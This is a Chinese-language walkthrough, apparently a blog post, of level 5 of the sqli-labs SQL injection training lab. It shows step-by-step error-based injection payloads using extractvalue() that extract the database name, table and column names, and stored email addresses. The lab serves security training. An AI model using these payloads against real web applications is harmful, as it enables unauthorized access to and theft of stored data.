sqli-labs---第五关

简介: sqli-labs---第五关

1、判断注入类型

?id=1(没有正常显示)提示了一串字符

?id=1'(出现了错误提示)

根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入

2、查询数据库名

?id=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

3、查询表名(看到敏感表users)


?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))) --+

4、查询users表中字段的信息


?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))) --+

5、查字段USER中的信息,这里查不出来,那就换一张表

 ?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(USER) from security.users),0x7e))) --+

6、查询emails 这张表中的字段信息


?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='emails'),0x7e))) --+

7、查询email_id中的值(这里就拿到了用户email信息)


  ?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(id,email_id) from security.emails),0x7e))) --+

相关文章
|
6月前
|
数据安全/隐私保护
【less-4】sqli-labs靶场第四关
【less-4】sqli-labs靶场第四关
|
7月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第四关
sqli-labs---第四关
|
7月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第三关
sqli-labs---第三关
|
6月前
|
SQL 安全 关系型数据库
【less-2】sqli-labs靶场第二关
【less-2】sqli-labs靶场第二关
|
7月前
|
安全 数据库
sqli-labs---第二关
sqli-labs---第二关
|
7月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
44 1
SQLi LABS Less-27
第27关使用GET请求传递参数,在url中构造payload即可 源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
349 0
SQLi LABS Less-27
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-22
2关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大
115 0
SQLi LABS Less-22
SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号
147 0
SQLi LABS Less-30
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
182 0
SQLi LABS Less-27a